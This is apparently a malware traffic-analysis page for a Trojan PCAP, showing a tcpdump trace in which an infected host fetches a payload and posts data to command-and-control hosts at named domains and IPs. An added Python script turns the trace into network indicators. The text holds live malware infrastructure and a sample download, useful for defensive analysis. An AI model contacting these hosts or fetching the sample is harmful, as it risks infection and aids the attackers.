wimel.at POST /news www.automaticallyej.top Malware Trojan PCAP file download Traffic Analysis

Download Attachments

  • 1 pcap datbb
    Date added: November 16, 2016 3:02 am Added by: admin File size: 168 KB Downloads: 90

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AUKP/detailed-analysis.aspx


2016-11-15 19:48:59.712525 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [.], ack 1043924111, win 256, length 0
E..(D.@….0…f.^>..f.PURl.>9..P………….
2016-11-15 19:48:59.715879 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET /admin.php?f=2.dat HTTP/1.1
E..WD.@……..f.^>..f.PURl.>9..P…6V..GET /admin.php?f=2.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.automaticallyej.top
Connection: Keep-Alive

2016-11-15 19:49:08.705790 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [.], ack 714180781, win 256, length 0
E..(..@….5…f..em.o.P&..U*…P…;………
2016-11-15 19:49:08.706516 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [P.], seq 0:966, ack 1, win 256, length 966: HTTP: POST /news.php HTTP/1.1
E…..@….n…f..em.o.P&..U*…P…….POST /news.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: wimel.at
Content-Length: 768
Connection: Close
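The two flows above are the ones an analyst would want to turn into indicators: a GET for /admin.php?f=2.dat against www.automaticallyej.top (23.94.62.145) and a POST to /news.php against wimel.at (210.16.101.109), both with the same legacy MSIE 8 User-Agent string. The following Python script is an added example, not code from the original post: it parses tcpdump -A style output of the kind shown above into one record per HTTP request and reduces those to the hosts, destination IPs, request paths and User-Agent strings to record for blocking and hunting. The sample input is the trace from this page embedded inline (constructed only in the sense of being pasted into a string); the regexes and the HttpRequest class are this example's own.

```python
import re
from dataclasses import dataclass, field

# Sample input: the tcpdump -A lines from the capture summary above, raw
# packet-byte lines included, so the parser is exercised on realistic output.
SAMPLE = """\
2016-11-15 19:48:59.712525 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [.], ack 1043924111, win 256, length 0
E..(D.@….0…f.^>..f.PURl.>9..P………….
2016-11-15 19:48:59.715879 IP 192.168.1.102.53862 > 23.94.62.145.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET /admin.php?f=2.dat HTTP/1.1
E..WD.@……..f.^>..f.PURl.>9..P…6V..GET /admin.php?f=2.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.automaticallyej.top
Connection: Keep-Alive

2016-11-15 19:49:08.705790 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [.], ack 714180781, win 256, length 0
E..(..@….5…f..em.o.P&..U*…P…;………
2016-11-15 19:49:08.706516 IP 192.168.1.102.53871 > 210.16.101.109.80: Flags [P.], seq 0:966, ack 1, win 256, length 966: HTTP: POST /news.php HTTP/1.1
E…..@….n…f..em.o.P&..U*…P…….POST /news.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: wimel.at
Content-Length: 768
Connection: Close
"""

# Packet summary line: timestamp, src IP.port > dst IP.port, then TCP flags.
PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags "
)
# HTTP request line, wherever it appears in the summary line.
REQ_RE = re.compile(r"\b(?P<method>GET|POST|HEAD|PUT)\s+(?P<uri>\S+)\s+HTTP/1\.[01]\b")
# 'Name: value' header line; raw packet-byte lines never match this.
HDR_RE = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*):\s*(?P<value>.*)$")


@dataclass
class HttpRequest:
    timestamp: str
    src: str
    sport: int
    dst: str
    dport: int
    method: str
    uri: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("Host", "")


def parse_requests(text: str) -> list:
    """One HttpRequest per summary line carrying 'HTTP: <method> <uri>'; the
    header lines that follow, up to a blank line or the next packet, attach to it."""
    requests, current = [], None
    for line in text.splitlines():
        pkt = PKT_RE.match(line)
        if pkt:
            req = REQ_RE.search(line)
            if req:
                current = HttpRequest(pkt["ts"], pkt["src"], int(pkt["sport"]),
                                      pkt["dst"], int(pkt["dport"]),
                                      req["method"], req["uri"])
                requests.append(current)
            else:
                current = None  # ack-only or non-HTTP packet
            continue
        if not line.strip():
            current = None  # blank line closes the header block
            continue
        hdr = HDR_RE.match(line)
        if current is not None and hdr:
            current.headers[hdr["name"]] = hdr["value"]
    return requests


def indicators(requests: list) -> dict:
    """Network indicators worth recording: contacted hosts, destination IPs,
    request paths and User-Agent strings."""
    return {
        "hosts": sorted({r.host for r in requests if r.host}),
        "dst_ips": sorted({r.dst for r in requests}),
        "uris": sorted({f"{r.method} {r.uri}" for r in requests}),
        "user_agents": sorted({r.headers.get("User-Agent", "") for r in requests}),
    }


def to_csv(requests: list) -> str:
    """One row per request, in a shape that pastes straight into a SIEM lookup."""
    rows = ["timestamp,src,dst,dport,method,uri,host,content_length"]
    for r in requests:
        rows.append(",".join([r.timestamp, r.src, r.dst, str(r.dport), r.method,
                              r.uri, r.host, r.headers.get("Content-Length", "")]))
    return "\n".join(rows)


if __name__ == "__main__":
    reqs = parse_requests(SAMPLE)
    print(to_csv(reqs))
    print(indicators(reqs))
```

Run it against a file produced with `tcpdump -A -r file.pcap -tttt` (the timestamp format the parser expects) by replacing SAMPLE with the file contents. The Host header, not the destination IP, is the indicator to pivot on: the same IP can front many names, and the POST with Content-Length 768 and Connection: Close is the part of this trace worth matching in proxy logs.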
